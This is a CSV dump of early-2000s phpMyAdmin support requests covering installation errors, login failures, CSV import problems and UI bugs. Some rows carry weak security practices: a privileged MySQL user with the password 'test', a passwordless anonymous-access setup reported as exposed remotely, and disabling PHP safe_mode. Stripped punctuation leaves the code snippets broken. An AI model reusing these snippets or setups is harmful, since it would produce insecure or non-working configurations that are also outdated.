Below is an example of how the SQL looks when inserting a user into the mysql user table INSERT INTO `user` `Host` , `User` , `Password` , `Select priv` , `Insert priv` , `Update priv` , `Delete priv` , `Create priv` , `Drop priv` , `Reload priv` , `Shutdown priv` , `Process priv` , `File priv` , `Grant priv` , `References priv` , `Index priv` , `Alter priv` ) VALUES localhost , test , PASSWORD test ) , Y,Y , Y,Y , Y,Y , Y,Y , N,N , N,N , N,N , N,N , N,N , N,N , N,N , N,N , N,N , N,N ); Original URL https sourceforge.net p phpmyadmin support requests 182 https sourceforge.net p phpmyadmin support requests 182 Original author anonymous","bug"
"24444","2000","MYSQL OR syntax.
How do I use the MYSQL OR syntax in phpmyadmin?
Original URL https sourceforge.net p phpmyadmin support requests 183 https sourceforge.net p phpmyadmin support requests 183 Original author grandtitus","bug"
"24444","2001","index.php displaying as source code.
I ve been using phpmyadmin 2.3.3 successfully on my Mac with OS 10.2, but now index.php comes up in two frames as source code.
Yesterday I upgraded to the latest OS 10.2.4...could that be a reason?
I installed phpmyadmin 2.4.0, but it does the same thing.
Any suggestions?
Jim Original URL https sourceforge.net p phpmyadmin support requests 184 https sourceforge.net p phpmyadmin support requests 184 Original author jpschwartz99","bug"
"24444","2002","How to make phpMyAdmin secure.
It s very possible that I am missing something here, but it seems to me that if I was having the following problem, it may affect others, too.
I have a single user me) Win2K Pro system running Apache 2.0.43, PHP 4.3.0, mySQL 4.01, and PHPmyAdmin 2.4.0 rc2 released on 14 Feb 2003.
Since I m the only one who uses my machine, and my code and I are the only ones accessing the databases, I didn t have localhost passwords, but, more to the point, the mysql connect functions throughout my site do not have user name passowrds I accomplished this by having a passwordless entry in mySQL.Users with localhost for Host and User left blank).
To alter the existing php file structure would cause me a lot of grief.
is protected, however.
I have been running PHPmyAdmin for many months so I am pretty lucky nobody stumbled onto it.
I use an auth type of http and I sort of assumed that anyone not accessing my machine locally would be barred from the database.
However, PHPmyAdmin IS MAKING A LOCAL CONNECTION TO MYSQL AT 127.0.0.1 EVEN WHEN ACCESSED REMOTELY.
It means that if someone accesses PHPmyAdmin from a remote site, all they have to do is think of a random name that I have not explicitly entered into the mySQL.Users table) with no password and they are in they cannot enter a blank name and blank password, but any nonblank name works just fine).
This is such a huge hole, that I have to think I am missing something.
Lest it be obscured by all the verbiage, the point is not whether I am doing everything correctly I m probably not, and feel free to suggest improvements).
THE POINT IS THAT OTHERS PROBABLY HAVE SIMILAR SETUPS WITH THE SAME TYPE OF EXPOSURE.
I have put the following patch in on my system within libraries common.lib.php 1) Main connection fix.
I have replaced the if clause with the first occurrence of tcp with the following if val[ connect type ] == tcp ) \{ if empty val[ host ])) unset cfg[ Servers ] [ key]); elseif strtolower val[ host ])== amp;quot;localhost amp;quot; || val[ host ]== 127.0.0.1 ) amp;amp; amp;amp; GLOBALS [ amp;quot;REMOTE ADDR amp;quot;]!= SERVER[ amp;quot;SERVER ADDR amp;quot;]) \{ cfg[ Servers ][ key][ controlhost ] = val[ host ]; if !
cfg[ Servers ][ key] [ verbose ]) cfg[ Servers ][ key][ verbose ] = val[ host ]; cfg[ Servers ][ key][ host ] = SERVER[ amp;quot;SERVER ADDR amp;quot;]; \} \} 2) PHPmyAdmin connection fix.
Find the first occurrence of connect and replace the entire if...else structure it is contained within with ctlHst = cfg[ Server ][ controlhost ] ?
cfg[ Server ][ controlhost ] cfg[ Server ][ host ]; if PMA PHP INT VERSION amp;gt;= 40300) \{ dbh = connect func ctlHst .
server port .
server socket, cfg[ Server ][ controluser ], cfg[ Server ][ controlpass ], FALSE, client flags ); \} else \{ dbh = connect func ctlHst .
server port .
server socket, cfg[ Server ][ controluser ], cfg[ Server ][ controlpass ] ); \} Regards from New York, Csaba Gabor http SocietyBalls.com Original URL https sourceforge.net p phpmyadmin support requests 185 https sourceforge.net p phpmyadmin support requests 185 Original author keringo","bug"
"24444","2003","Cannot Log on.
I am using the latest RC that I downloaded today.
I get everything to install correctly, at least that is what the installation program says.
I then go to Log on to the site after just creating my Username and password and I get a password incorrect error.
I have tried everything from making the password 8 characters to 4 characters.
I re installed several times.
What could be causing this problem?
Original URL https sourceforge.net p phpmyadmin support requests 186 https sourceforge.net p phpmyadmin support requests 186 Original author kevinrstruck","bug"
"24444","2004","need help configuring phpmyadmin.
hello I have a little problem here.
I had PhPtriads running on winx really fine and now i am trying to do the same under Red Hat 8.
Apache mysql and php is running ok .
Ok This is what i did .
I simply unzipped the tarball into my var www html directory amp;lt; renamed it phpmyadmin amp;gt; and then .
typed in mozilla amp;quot; localhost phpmyadmin index.php amp;quot; this is what I did in Win X but here I get this error message cannot load MySQL extension, please check PHP Configuration.
I am stuck here.
What is the step by step correct procedure for configuring phpmyadmin please Original URL https sourceforge.net p phpmyadmin support requests 187 https sourceforge.net p phpmyadmin support requests 187 Original author phil81","bug"
"24444","2005","Left frame goes back when showing table.
When logged as admin, whenever I click on the Brrowse link in the upper part of the right frame, the left frame goes back home instead of keeping the active table selected.
It asks me to select a data base, still showing correctly the data in the right frame.
Original URL https sourceforge.net p phpmyadmin support requests 188 https sourceforge.net p phpmyadmin support requests 188 Original author anonymous","bug"
"24444","2006","Relation view not showing Keys fields.
A database with no PRIMARY keys shows no relations to choose from other than fields within current table).
When no PRIMARY key exists, any Non unique is supposed to be listed in the pulldown menu for defining relations.
This is not working.
amp;quot;tbl relation.php amp;quot; line 363 \} else if isset curr field[ Non unique ]) amp;amp; amp;amp; curr field[ Non unique ] == 0) \{ The amp;quot;== 0 amp;quot; should apparently be amp;quot;== 1 amp;quot;, as I am seeing 1 in Non unique in my amp;quot;SELECT KEYS amp;quot; results.
Original URL https sourceforge.net p phpmyadmin support requests 189 https sourceforge.net p phpmyadmin support requests 189 Original author anonymous","bug"
"24444","2007","Fatal error on import from text file.
When importing records from a csv text file, program produces a fatal error as follows Error SQL query LOAD DATA INFILE tmp php11689aaa INTO TABLE `thedirectory` FIELDS TERMINATED BY , ENCLOSED BY amp;quot; ESCAPED BY \\ LINES TERMINATED BY \r\n `dir location` , `dir telno` , `dir company` , `dir name` , `dir email` , `dir email2` , `dir categoryname` ) MySQL said Access denied for user dbonnnnnnn infong121.kundenserver.de Using password YES) User name and password is properly configured in config.inc and identical procedure works fine in ver 2.32 mikevg ntlworld.com Mike Van Gent Original URL https sourceforge.net p phpmyadmin support requests 190 https sourceforge.net p phpmyadmin support requests 190 Original author anonymous","bug"
"24444","2008","support for update.
Hi, right now i am running phpMyAdmin 2.2.3 I would like to update it to 2.4 but i dont know how or what I have to be careful of?
Thanks in advance DxD Original URL https sourceforge.net p phpmyadmin support requests 191 https sourceforge.net p phpmyadmin support requests 191 Original author myroot66","bug"
"24444","2009","Insert text file.
I downloaded phpMyAdmin and was using it locally while testing my site.
It offered a link at the bottom of the page that said amp;quot;Insert data from a text file amp;quot; and then opened a page that allowed uploading a text file.
However, when I uploaded phpMyAdmin to my host s server for use on the live site, this link for inserting data from a text file disappeared.
I downloaded phpMyAdmin again and uploaded it to the host, but still no link.
Then I looked into the files, and found mention of this link in amp;quot;table properties structure.php amp;quot; and found the linked page amp;quot;ldi table.php amp;quot; yet the ability to insert text files is still missing.
Does anyone know why I can t get this functionality back?
Original URL https sourceforge.net p phpmyadmin support requests 192 https sourceforge.net p phpmyadmin support requests 192 Original author anonymous","bug"
"24444","2010","unknown column in alter table op s RH8).
I ve read thru the forum s here, but i ve not been able to solve my problem.
When I do any kind of alter table operation, i get an unknown column error.
I ve read that this could be caused by using PHP 4.2.3, but I m using 4.2.2 on RH8 with mysql 3.23.52.
Here s a sample of what s happening SQL query ALTER TABLE `orders` CHANGE `order date` `order date` DATE DEFAULT NOW NOT NULL , CHANGE `order date` `order date` DATE DEFAULT NOW NOT NULL MySQL said Unknown column order date in orders Any idea of what the bug is or what I can do to fix this....and please don t tell me to upgrade php grin ) as its hard as heck to do on RH8...beginning to think another flavor of linux may be a better choice.
Thanks!
Original URL https sourceforge.net p phpmyadmin support requests 193 https sourceforge.net p phpmyadmin support requests 193 Original author te2586","bug"
"24444","2011","2.4.0) Cannot find page after updating field contents.
When I select a table, click Browse and try Edit ing a row, after I click the Go button, I do not get an results page, merely an standard page Page cannot be found.
It does seem to update the table contents though.
table phpbb users an user table from the phpbb bulletin board system) phpmyadmin version 2.4.0 mysql version 3.23.54 nt php version 4.3.0 system running windows 2000 regards, eelcapone AT beer DOT com Original URL https sourceforge.net p phpmyadmin support requests 194 https sourceforge.net p phpmyadmin support requests 194 Original author anonymous","bug"
"24444","2012","config.inc.php3 configuration problem for unix server.
Greetings, I have posted my problem on your forum, but for some reason nobody has responded to my help request.
I need help urgently, as I have been working on this issue for 10 days now, but I have not succeed in resolving the issue or getting any assistance from anybody.
My web hosting company does not provide support for this and referred me to your site.
Situation Trying to install phpMyAdmin on my sever, as my web hosting company doesn t provide this service and is only able to setup the data base on their MySQL.
What has been done Download phpMyAdmin 2.4.0 php3.zip has been downloaded and transferred by FTP binary mode) to www.bethecause.org phpMyAdmin Other things that I have tried CHMOD changes to 755 Saved the file under http bethecause.org phpMyAdmin www omitted) Downloaded the program Download phpMyAdmin 2.4.0 php.zip previously but encountered the same blank page.
Changed auth type cookie, http amp;amp; config all 3 have been tried, but still no luck.
Problem After making the necessary configuration changes on config.inc.php3 I only get a blank page whenever I enter www.bethecause.org phpMyAdmin ; or www.bethecause.org phpMyAdmin index.php3 Enclosed is the attached config.inc.php3 file for your reference.
I have hidden the password.
I have also tried to fix the problem by changing the below from TRUE to FALSE, but it did not fix the problem.
cfg[ OBGzip ] = FALSE; use GZIP output buffering if possible Thank you.
Vijay Mahbubani Original URL https sourceforge.net p phpmyadmin support requests 195 https sourceforge.net p phpmyadmin support requests 195 Original author bethecause","bug"
"24444","2013","Developers Help.
Is there any newsgroup or form where the developers talk back and forth and decide what is going to be done?
Somewhere that i can decide what would be good for me to do.
I also need help in submitting the changes.
where do i submit them to??
Brendan Original URL https sourceforge.net p phpmyadmin support requests 196 https sourceforge.net p phpmyadmin support requests 196 Original author knightt","bug"
"24444","2014","Setting up arrays for multiple servers.
Is there any examples that I can look at in setting up arrays to manage multiple servers?
The configurartion documantation is pretty vague.
For instance do you need to label each array set so the system knows which server to point to for the set of info in the array.
How do you specify the URL to the server in the array?
Les Kinseth les esavvysystems.com Original URL https sourceforge.net p phpmyadmin support requests 197 https sourceforge.net p phpmyadmin support requests 197 Original author lkinseth","bug"
"24444","2015","HTTP auth with PHP 4.3 amp; safe mode.
Since PHP 4.3, there is a special restriction on PHP AUTH variables when safe mode is ON.
see http bugs.php.net bug.php?id=20441, http bugs.php.net bug.php?id=21620 and http bugs.php.net bug.php?id=19251.
It affects HTTP authentification with multi users acces rigths read from mysql.
This means that pma auth check from http.auth.lib.php always return empty PHP AUTH PW, and by the way mysql auth check always fails !
One workaround would be to turn off safe mode in phpmyadmin directory by using .htaccess directive under apache only of course ... ) amp;lt;directory amp;quot;where is phpmyadmin amp;quot; amp;gt; php admin flag safe mode off php admin value open basedir amp;quot; where is phpmy.. amp;quot; amp;lt; directory amp;gt; It is safe to add an open basedir restriction to make sure no files outside phpmyadmin dir.
could be read.
Any other workaround to suggest not needing any change on webserver ?
Tks for your good job on phpmyadmin Yvan yvan.garnier laposte.net Original URL https sourceforge.net p phpmyadmin support requests 198 https sourceforge.net p phpmyadmin support requests 198 Original author anonymous","bug"
"24444","2016","Blob field empty after record edit.
I ve run into a very odd problem I have a table with several fields, one of them a blob.
When I open a record to edit, it says amp;quot;Binary do not edit amp;quot; which is fine, I don t need to edit that field.
But, when I save the record, the blob field is suddenly empty.
I ve tested this a number of times to be sure, verifying that there s something in that field, saving the edit, and checking again.
This is really dangerous.
Any ideas?
BTW, the table has 22 fields and 477 records.
I ve checked the table and it s not damaged.
Original URL https sourceforge.net p phpmyadmin support requests 199 https sourceforge.net p phpmyadmin support requests 199 Original author anonymous","bug"
"24444","2017","Failed opening required file.
Hello, I have make a QuickInstall of phpMyAdmin 2.4.0 I have always this error when I try to connect to phpMyAdmin Warning main .
libraries grab globals.lib.php) [function.main] failed to create stream No such file or directory in Users vml public html phpMyAdmin 2.4.0 index.php on line 9 Fatal error main ) [function.main] Failed opening required .
libraries grab globals.lib.php include path= .
usr local lib php ) in Users vml public html phpMyAdmin 2.4.0 index.php on line 9 Before and after my changes on config method, urlAbsolute, default langage) The libraries s folder seem to be correct.
I m on MacOS X 10.2.4 with Apache 1.3.27, php 4.3.2, phpMyAmin 2.4.0 for 5 days I make the same install without probleme.
The differences are in the versions MacOS X 10.2.3, phpMyAdmin older but which one I can t remember) If someone have an idea, I try to install 6 times and I have always this problem.
Original URL https sourceforge.net p phpmyadmin support requests 200 https sourceforge.net p phpmyadmin support requests 200 Original author anonymous Found in version 2.4.0","bug"
"24444","2018","Lost Forum and all Messages?
Please Help!!.
I was trying to organize the threads on my PhP message board by adding forums and in the process, I have lost all the messages on my board.
I had a forum that contained all of the messages but this forum is no longer available in my forum options.
I am almost certain that just prior to this, I was in forum options and chose the option to turn the forum off and now I can no longer see any messages that were previously posted.
I was never prompted to delete the forum not sure if this would happen anyhow) but I can t possibly believe it would be so simple to lose so much.
Please help.
Original URL https sourceforge.net p phpmyadmin support requests 201 https sourceforge.net p phpmyadmin support requests 201 Original author jonblazn","bug"
"24444","2019","Left Window Pane acnnot be Displayed.
After installing system and finally getting into phpMyAdmin I cannot get the Left pane to display.
The installation is raw in that all defaults are set as per installation.
I have installed PmaAbsoluteUri with a at the end I assume this is necessary as per the config notes.
Can anyone help please.
Many thanks in advance regards Sean McPoland Windows XP SP1 all fixes MySQL 3.23.55 nt Zend Studio PHP 4.2.2 phpMyAdmin 2.4.0 Original URL https sourceforge.net p phpmyadmin support requests 202 https sourceforge.net p phpmyadmin support requests 202 Original author smcpoland Found in version 2.4.0","bug"
"24444","2020","User Error Page.
How can I modify the page shown when an user try with an erroneous pass and or name?
Original URL https sourceforge.net p phpmyadmin support requests 203 https sourceforge.net p phpmyadmin support requests 203 Original author anonymous","bug"
"24444","2021","ORDER BY messes up row count.
Hi, The following query produces a correct summary of the number of rows selected Showing rows 0 19 20 total) SELECT bugs.
FROM bugs LEFT JOIN bugs AS b ON bugs.Created = b.Created AND b.Rev amp;gt; bugs.Rev WHERE b.Rev IS NULL If I include ORDER BY Priority at the end of the query, I get the correct results ie.
it is showing me the 20 rows, properly sorted), but the summary is wrong because it now tells me the total number of rows in my table Showing rows 0 23 24 total) I am on a Win2K PHP 4.3.1 Apache 2.0.43 mySQL 4.0.11 system.
I probably won t be updating to the next version in the near future till mySQL 4.1 is out.
A related bug or two has appeared in the past see 447771, for example), but I didn t find anything current.
Regards, Csaba Gabor from New York Original URL https sourceforge.net p phpmyadmin support requests 204 https sourceforge.net p phpmyadmin support requests 204 Original author keringo","bug"
"24444","2022","Cannot insert.
The version of PHP I use has changed to 2.4.0 and know my insert select sql statements do not work properly.
It will insert a new record in the table, but not populate the fields with any data.
Has the syntax changed for database manipulation on this version?
Any help is appreciated.
Thank you!
Original URL https sourceforge.net p phpmyadmin support requests 205 https sourceforge.net p phpmyadmin support requests 205 Original author anonymous Found in version 2.4.0","bug"
"24444","2023","Wrong parameter count for mysql connect ).
amp;gt;Error amp;gt; amp;gt;MySQL said amp;gt; amp;gt; amp;gt;Wrong parameter count for mysql connect ) amp;gt; PHP Version 4.3.0 dev phpMyAdmin Version 2.4.0 I believe the error is PHP version 4.3.0 dev does not support client flags parameter for mysql connect and mysql pconnect function.
phpMyAdmin is incorrectly assuming that this version of PHP is the release version, 4.3.0 and hence trying to pass all parameters.
Changes either required to libraries defines php.lib.php 20) or libraries common.lib.php 692) and libraries common.lib.php 733) Original URL https sourceforge.net p phpmyadmin support requests 206 https sourceforge.net p phpmyadmin support requests 206 Original author blacksway Found in version 2.4.0","bug"
"24444","2024","Problems Uploading csv file into My SQL.
Hi, I am trying to resolve an issue with uploading csv files into MySQL.
I have a MySQl server database hosted by www.oneandone.co.uk I have created the Database structure, exported the structure to csv and added all records.
When I attempt to upload using PhpMyAdmin latest release).
I get the following error MySQL said Access Denied for user on db server using password YES) I have checked with oneandone and they keep saying everythings ok.
They inserted the csv file themselves with no problems.
In order to resolve this I am trying to find out if there are settings besides servername, database name, user id, password that I need to complete to ensure that csv upload works.
Cheers Raj Original URL https sourceforge.net p phpmyadmin support requests 207 https sourceforge.net p phpmyadmin support requests 207 Original author titanium01","bug"
"24444","2025","sometimes db privileges are not shown.
I have an user whose user name starts with a numeric character.
This user is shown in user overview but once I click on edit , database specific privileges are NOT shown.
This bug is also present in 2.4.0 rc1 and rc2, phpMyAdmin 2.3.3 pl1 shows the given privileges correctly.
Original URL https sourceforge.net p phpmyadmin support requests 208 https sourceforge.net p phpmyadmin support requests 208 Original author ci dev","bug"
"24444","2026","PHPMYADMIN installation.
I am new to phpmyadmin.
I fellow througth the documents but i am still having a problem with running the index.php3.
I have setup Apache webserver.
installed a mysql install phpmyadmin try to run index.php3 but it openup in browser but don t know if i am missing something???
Help Original URL https sourceforge.net p phpmyadmin support requests 209 https sourceforge.net p phpmyadmin support requests 209 Original author anonymous","bug"
"24444","2027","Cannot load .csv data into table.
I m using phpMyAdmin 2.3.0 rc3 with MySQL 4.0.12 and al of a sudden it is no longer possible to insert data into an existing table.
I m loading data into the table, using a .csv file.
LOAD DATA LOCAL INFILE var tmp ....
REPLACE INTO TABLE `...` FIELDS TERMINATED BY ; OPTIONALLY ENCLOSED BY amp;quot; ESCAPED BY \\ LINES TERMINATED BY \r\n MySQL said The used command is not allowed with this MySQL version What s wrong here?
Does anybody have an idea?
Please let me know Original URL https sourceforge.net p phpmyadmin support requests 210 https sourceforge.net p phpmyadmin support requests 210 Original author marcdelaet","bug"
"24444","2028","I get an error message when I try to edit text in phpMyAdmin.
I get an error message when I try to edit text inphpMyAdmin 2.3.2 Did you install some update that might be chocking on some characters in my code?
Original URL https sourceforge.net p phpmyadmin support requests 211 https sourceforge.net p phpmyadmin support requests 211 Original author anonymous","bug"
"24444","2029","Executing SQL from an uploaded file.
I got problems to execute SQL from a file uploaded.
file was created by phpmyadmin, this was for moving to another web server.
requests are simple Structure de la table `notes` CREATE TABLE notes id int 16) NOT NULL auto increment, colle varchar 10) NOT NULL default , random varchar 10) NOT NULL default , doublant varchar 10) NOT NULL default , tuteur varchar 4) NOT NULL default , note varchar 5) NOT NULL default , PRIMARY KEY id), UNIQUE KEY id id), KEY id 2 id) ) TYPE=MyISAM; Contenu de la table `notes` INSERT INTO notes VALUES 1, 1 , 47 , P , 12 , 13 ); INSERT INTO notes VALUES 2, 1 , 48 , D , 12 , 9 ); INSERT INTO notes VALUES 3, 1 , 49 , P , 12 , 14 ); ... for 9000 rows.
The problem was a amp;quot;Syntax Error amp;quot; in SQL, but i was sure that there were none.
I had to write a SQL file parser to extract SQL queries and execute them on server.
I worked fine like this.
script i used is given here for anyone that need it Original URL https sourceforge.net p phpmyadmin support requests 212 https sourceforge.net p phpmyadmin support requests 212 Original author jpgiot","bug"
"24444","2030","installation problems.
I am new to PHPMYADMIN.
I ve downloaded it to my desktop, unzipped it using WinZip, and I am unable to edit the the config file as instructed in the documentation.
As I said before, I am new.
I need step by step instructions and explanations.
Maybe Winzip is not good?
or my edit program ultraedit)?
Original URL https sourceforge.net p phpmyadmin support requests 213 https sourceforge.net p phpmyadmin support requests 213 Original author anonymous","bug"
"24444","2031","cannot relogin after logout.
I have recently installed phpMyAdmin 2.4.0 on my project page at SourceForge.
After installation, I set the config to use tcp connection, http authentication, no username and no password.
When testing the installation, I can successfully login into the page.
Logout, an authentication box pops up.
Typing again the same username and password does not permit me to login.
Clearing the URL to only amp;quot;http someproject.sourceforge.net phpmyadmin amp;quot; and pressing enter will automatically login to the page.
Closing the browser and browsing amp;quot;http someproject.sourceforge.net phpmyadmi n amp;quot;, I can login in again normally.
I suspect this is related to cookies not being cleaned after logout.
Original URL https sourceforge.net p phpmyadmin support requests 214 https sourceforge.net p phpmyadmin support requests 214 Original author sharuzzaman Found in version 2.4.0","bug"
"24444","2032","hangs with gt;10 cols.
phpMyAdmin 2.4 hangs whenever I use it to create a table amp;gt;10 cols or to view the structure.
The data, 12 cols and 1000 rows, is OK.
I have experienced this problem with 1) Win2K server, IIS, mySQL 3.23.54 nt, and php 4.3 and 2) WinXP, Apache, mySQL 3.23.54 nt, and php 4.3.
What am I doing wrong?
Thanks.
Original URL https sourceforge.net p phpmyadmin support requests 219 https sourceforge.net p phpmyadmin support requests 219 Original author psue Found in version 2.4.0","bug"
"24444","2033","Cannot add header information.
After installation and configuration just like in the previous version I always get this contrary to the previous version) Warning Cannot add header information headers already sent by output started at d \program files\easyphp\www\phpmyadmin2\config.inc.php 523) in d \program files\easyphp\www\phpmyadmin2\index.php on line 43 What can I do ?
Original URL https sourceforge.net p phpmyadmin support requests 215 https sourceforge.net p phpmyadmin support requests 215 Original author fjanssens Found in version 2.4.0","bug"
"24444","2034","user permissions not assigning.
When Creating or editing a phpMyAdmin)Created new user in the mysql database, permissions are not assigned or are incorrectly assigned!
Original URL https sourceforge.net p phpmyadmin support requests 216 https sourceforge.net p phpmyadmin support requests 216 Original author anonymous Found in version 2.4.0","bug"
"24444","2035","export gone wrong.
when I tried to backup my database onto my computer there was a huge section of gibberish, like this xc4x8cxc2x941cxc5x9a xc5xa1 amp;quot;cLxc2x91 amp;lt;xc2x82 x08x07xc5xbd amp;gt;xc2xb8oxc5x99xcbx9dxc3xa9xc3x97x0fxc5xbd\\;|xc3xbc amp;lt;x03xc2x8a amp;amp;xc5xa41dx06x13Hxc2x84x01 xc3x9cxc4x9b only a LOT more of it).
Anyway, I didn t notice this at first, and after a change to my db, i needed to replace i with the backup.
So I deleted my db and tried to upload my backup as a zip file, sql file, and txt file, all to no avail.
I get amp;quot;No MySQL Query found!
amp;quot; every time.
When i try to just paste the code into the box there s so much there that my internet explorer freezes.
So now I have a blank database, and a backup that i need, but doesn t work.
is there ANYTHING I can do?
I have attached the zip file phpmyadmin made when I downloaded the backup.
Original URL https sourceforge.net p phpmyadmin support requests 217 https sourceforge.net p phpmyadmin support requests 217 Original author milltime51","bug"
"24444","2036","page not found .
Hey there, I ve got a problem and I thought that I d ask you to help me out.
I m doing a project, a database driven website, and I m currently testing it on 127.0.0.1 localhost).
I m using phpMyAdmin for administration purposes and I m facing a problem phpMyAdmin shows page not found when I click on large tables 10 rows amp;amp; 6 cols).
I have set the cfg[ PmaAbsoluteUri ] as follows cfg[ PmaAbsoluteUri ] = http localhost phpMyAdmin ; I thought that there might be some problem with phpMyAdmin or maybe I have to tweak it a bit.
Details of Softwares used on system Database MySQL 3.23.55 script php 4.2.1 Web Server Apache 2.0.39.
Number of Tables for project seventeen 17) Operating System WinXP Professional.
System Config Intel Pentium 4 1.7GHz, 512MB RAM.
waiting for you reply.
m.Ahmed mankool dr.com Original URL https sourceforge.net p phpmyadmin support requests 218 https sourceforge.net p phpmyadmin support requests 218 Original author anonymous","bug"
"24444","2037","Mysql states please upgrade the client ).
After installing a 4.1 mysql and phpMyAdmin 2.5.0 rc2 trying to connect to the second instance of mysql gives the following output Client does not support authentication protocol requested by server.
Consider upgrading MySQL client Original URL https sourceforge.net p phpmyadmin support requests 220 https sourceforge.net p phpmyadmin support requests 220 Original author anonymous","bug"
"24444","2038","2.2 runs, 2.5 rc1 does not.
I ve been running phpMyAdmin on OSX ofr a qhile now.
I just downloaded 2.50 rc 1, and updated it s config file with my parameters absolute url, host, user and pass, but, when I access via http I get a amp;quot;you don t have permission to acces... amp;quot; Any ideas?
bot phpMyAdmin2.2.2 and phpMyAdmin2.50 are in the same root level...
Original URL https sourceforge.net p phpmyadmin support requests 221 https sourceforge.net p phpmyadmin support requests 221 Original author anonymous Found in version 2.5.0 rc1","bug"
"24444","2039","Authentication protocol not supported..
Using phpMyAdmin v2.5.0 RC1, PHP v 4.3.2 RC1 and MySQL v4.1.0 Alpha displays this error message when trying to login with auth type set to config, http or cookie Client does not support authentication protocol requested by server.
Consider upgrading MySQL client This presents a BIG problem because you cannot logon to MySQL at all.
My email address for this issue will be autherr projectredline.cjb.net Original URL https sourceforge.net p phpmyadmin support requests 222 https sourceforge.net p phpmyadmin support requests 222 Original author anonymous","bug"
"24444","2040","SELECT table with pma relation related table error.
Hi, I have some tables related to my main table with pma relation).
When I try to select a subset of my main table with the select link in the table overview page, I get an error in the QBE field Error SQL query SHOW TABLE STATUS LIKE de dob FROM de dob MySQL said You have an error in your SQL syntax near FROM de dob at line 1 de dob is my main table.
The error occurs in the Value cell of my first linked related table.
Any ideas or do you need additional informations?
Thanks for your great product.
Best regards from Hamburg, Germany, Rado rado planetmail.net Original URL https sourceforge.net p phpmyadmin support requests 223 https sourceforge.net p phpmyadmin support requests 223 Original author anonymous Found in version 2.5.0 rc1","bug"
"24444","2041","Duplicate entries when adding modifying table structure.
Whenever I add a table, or modify the table structure i.e.
add a column) via the phpmyadmin interface, it tries to do the operation twice.
Here i tried to add a column named test.
Error SQL query ALTER TABLE `applications` ADD `test` TINYINT NOT NULL , ADD `test` TINYINT NOT NULL MySQL said Duplicate column name test Original URL https sourceforge.net p phpmyadmin support requests 224 https sourceforge.net p phpmyadmin support requests 224 Original author anonymous Found in version 2.5.0 rc1","bug"
"24444","2042","Installation verification into a web server root directory... Hello, I am having problems with installation of phpMyAdmin v2.4.0.
I installed via FTP into my web server root directory in a UNIX FreeBSD platform which it is using PHP4.
That is all the info they give.
Now, I followed the quick installtion with host MySQL), u n and p w, either config or http for authentication mode and when I try verification at http www.mydomainname.com index.php3, all I get in the screen is source code.
Why the difference ???
Anyone that my offer help ???
Same story with a form designed in Dreamweaver MX, I just get source code on the screen and nothing else.
Juan Original URL https sourceforge.net p phpmyadmin support requests 225 https sourceforge.net p phpmyadmin support requests 225 Original author genesiscode Found in version 2.4.0","bug"
"24444","2043","include require b0rked with PHP 4.3.2 RC1.
It would appear as though the amp;quot;include amp;quot; and amp;quot;require amp;quot; directives are now borked thanks to newer versions of PHP.
I ve submitted a bug to the folks at php.net but it quickly got closed with amp;quot;as per design amp;quot; looks like they intentionally ?)
broke relative directory references.
http bugs.php.net bug.php?id=23282 Now with even old versions of phpmyadmin as well as current versions), the follow errors pop up...
I ve intentionally obfuscated the directories on the filesystem below, a little but they are amp;quot;correct amp;quot; a direct copy and paste of the absolute path reveal the correct file) begin [Mon Apr 21 17 34 06 2003] [error] PHP Warning main .
libraries grab globals.lib.php) [ amp;lt;a href= http www.php.net function.main amp;gt;function.main amp;lt; a amp;gt;] failed to open stream No such file or directory in path to dir phpMyAdmin 2.5.0 rc1 index.php on line 9 [Mon Apr 21 17 34 06 2003] [error] PHP Fatal error main ) [ amp;lt;a href= http www.php.net function.require amp;gt;function.require amp;lt; a amp;gt;] Failed opening required .
libraries grab globals.lib.php include path= .
usr local php 4.3.2rc1 lib php ) in path to dir phpMyAdmin 2.5.0 rc1 index.php on line 9 end The lines it is complaining about are begin require .
libraries grab globals.lib.php ); require .
libraries common.lib.php ); end ...and are verified as readable to the world.
If I remove the amp;quot;.
amp;quot; on each of those amp;quot;require amp;quot; lines, the script works properly.
So, this is a bug in either PhpMyAdmin or PHP if you ask me, it s in PHP though they are currently saying that amp;quot;This is how it s supposed to work amp;quot; as per sniper php.net).
Original URL https sourceforge.net p phpmyadmin support requests 227 https sourceforge.net p phpmyadmin support requests 227 Original author russellvt","bug"
"24444","2044","Frames do not load after login.
I am running phpMyAdmin version info below) on Mac OS X and using a mozilla browser to view the pages.
After I log in, the frame set appears, but none of the frames load.
I am able to use phpMyAdmin properly on IE 5.5 Mac OS X and Opera 6 Mac OS X. I have noticed that there are some internet sites often php) that do not display render at all on my Mac while using mozilla netscape 7.
Version info phpMyAdmin 2.3.3pl1, 2.5.0 rc1 Mac OS X uname a Darwin localhost 6.5 Darwin Kernel Version 6.5 Mon Apr 7 17 05 38 PDT 2003; root xnu xnu 344.32.obj 1 RELEASE PPC Power Macintosh powerpc Mozilla Mozilla 1.4a Mozilla 5.0 Macintosh; U; PPC Mac OS X Mach O; en US; rv 1.4a) Gecko 20030401 Original URL https sourceforge.net p phpmyadmin support requests 228 https sourceforge.net p phpmyadmin support requests 228 Original author oubiwann","bug"
"24444","2045","Can t connect to local MySQL server through socket var lib.
i kid you not i read about 40 different sites trying everything anyone said.
the database is up and running.
PLEASE help, i have no more places to go for help.
ive exausted linux and php.
nobody can figure it out.
i dont think its a fault in this software.
i tired mysql connect amp;quot;blah amp;quot;, amp;quot;blah amp;quot;, amp;quot;blah amp;quot;)or die amp;quot;wee amp;quot;); and i get the same error.
thanks for any help.
Thanks.
Error is Welcome to phpMyAdmin 2.5.0 rc1 Error MySQL said Can t connect to local MySQL server through socket var lib mysql mysql.sock 13) here is some info about what is up........ i can connect to the database as root.
httpd and mysql are both on teh same server.
